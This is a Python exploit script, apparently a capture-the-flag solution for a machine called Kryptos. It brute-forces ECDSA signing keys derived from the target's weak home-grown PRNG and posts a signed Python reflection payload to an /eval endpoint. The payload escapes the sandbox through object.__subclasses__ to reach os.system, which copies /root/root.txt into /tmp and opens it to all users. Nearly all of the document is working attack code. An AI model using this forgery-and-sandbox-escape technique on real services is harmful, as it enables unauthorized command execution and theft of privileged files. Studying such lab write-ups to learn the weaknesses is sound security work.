Getting root access on Kryptos by abusing a weak PRNG (brute-forcing the ECDSA signing key it derives) and Python reflection (a sandbox-escaping payload sent to the signed /eval endpoint)
import random
import json
import hashlib
import binascii
from ecdsa import VerifyingKey, SigningKey, NIST384p
from bottle import route, run, request, debug
from bottle import hook
from bottle import response as resp
import sys
import requests
def secure_rng(seed):
    """Reproduce the target's home-grown "secure" 256-bit RNG.

    The construction resembles Blum-Micali: starting from ``seed`` it iterates
    ``x -> g**x mod p`` over the prime ``p = 2**31 - 1`` (M31) and emits one
    bit per step, set when the new state lies in the upper half of ``[0, p)``.
    Step ``i`` produces bit ``i`` of the result, so the first step gives the
    least-significant bit.

    It is *not* secure, and that is what the brute force below exploits: the
    state after the first step is ``pow(g, seed, p)``, which by Fermat's little
    theorem depends only on ``seed mod (p - 1)``.  Any seed, however wide,
    therefore collapses to one of at most ``p - 1 < 2**31`` output streams --
    and fewer still if ``g`` does not generate the whole group (not verified
    here).

    Args:
        seed: Non-negative integer seed.

    Returns:
        An integer in ``[0, 2**256)``.
    """
    # Taken from the internet - probably secure (original author's comment).
    modulus = 2147483647       # 2**31 - 1, prime
    generator = 2255412
    key_bytes = 32
    upper_half = (modulus - 1) // 2   # states above this yield a 1 bit
    state = seed
    output = 0
    for bit_index in range(key_bytes * 8):
        state = pow(generator, state, modulus)
        if state > upper_half:
            output |= 1 << bit_index
    return output
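def verify(msg, sig):
    """Verify a hex-encoded ECDSA signature over ``msg`` with the module-level
    verifying key ``vk``.

    Any failure -- malformed hex, wrong length, or a signature that does not
    verify -- yields ``False`` rather than an exception.  Unlike the bare
    ``except:`` this replaces, ``KeyboardInterrupt``/``SystemExit`` are no
    longer swallowed, so Ctrl-C still works.

    ``vk`` is assigned by the brute-force loop at module level; calling this
    before a candidate key exists also returns ``False``.

    Args:
        msg: The message bytes that were signed.
        sig: Hex string (or bytes) of the signature.

    Returns:
        ``True`` if the signature verifies, else ``False``.
    """
    try:
        raw_sig = binascii.unhexlify(sig)
    except (TypeError, ValueError):
        # Py3 raises binascii.Error (a ValueError); Py2 raises TypeError.
        return False
    try:
        return vk.verify(raw_sig, msg)
    except Exception:
        # ecdsa raises BadSignatureError on a mismatch (not imported here).
        return False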
def sign(msg):
    """Sign ``msg`` with the module-level signing key ``sk``.

    Args:
        msg: Message bytes to sign.

    Returns:
        The signature hex-encoded (``bytes`` on Python 3, ``str`` on Python 2).
    """
    raw_signature = sk.sign(msg)
    return binascii.b2a_hex(raw_signature)
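# NOTE: this script is written for Python 2 (the original used print
# statements).  Under Python 3, `expr` must be encoded to bytes before signing
# and `sig` decoded from bytes before it can be JSON-encoded.
print("[+] Signing expression..")
# Reflection payload: int -> object -> every loaded subclass of object, pick the
# compiled-regex class, and reach the real __import__ through its module
# globals -- presumably to escape a sandbox that strips builtins from the
# evaluated expression.  The class is named `Pattern` only on Python 3.7+
# (earlier it was `SRE_Pattern`), so the payload assumes a 3.7+ target.  The
# copy only yields root.txt if the evaluating service itself runs as root.
expr = "[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['__import__']('os').system('cp /root/root.txt /tmp/xct && chmod 777 /tmp/xct')"
# Intercepting proxy on localhost:9090 so each attempt can be inspected.
proxies = {'http': "http://localhost:9090"}
# Per-request timeout in seconds; without one a stalled target hangs the loop forever.
REQUEST_TIMEOUT = 10
response = 'Bad signature'
print("Bruting..")
# Draw seeds until the target stops rejecting the signature.  secure_rng() only
# depends on its seed mod (p - 1), so the 128 bits drawn here are mostly wasted;
# the search is practical only because the target's key space is presumably
# small (the gist title calls the PRNG weak).
while response == 'Bad signature':
    seed = random.getrandbits(128)
    rand = secure_rng(seed) + 1          # +1: the secret exponent must be non-zero
    sk = SigningKey.from_secret_exponent(rand, curve=NIST384p)
    vk = sk.get_verifying_key()
    sig = sign(expr)
    r = requests.post('http://127.0.0.1:81/eval',
                      json={'expr': expr, 'sig': sig},
                      proxies=proxies, timeout=REQUEST_TIMEOUT)
    response = r.text
# Anything other than 'Bad signature' ends the loop -- including an HTTP error
# page -- so print the body to tell a real hit from a target-side failure.
print(r.text)
print(seed)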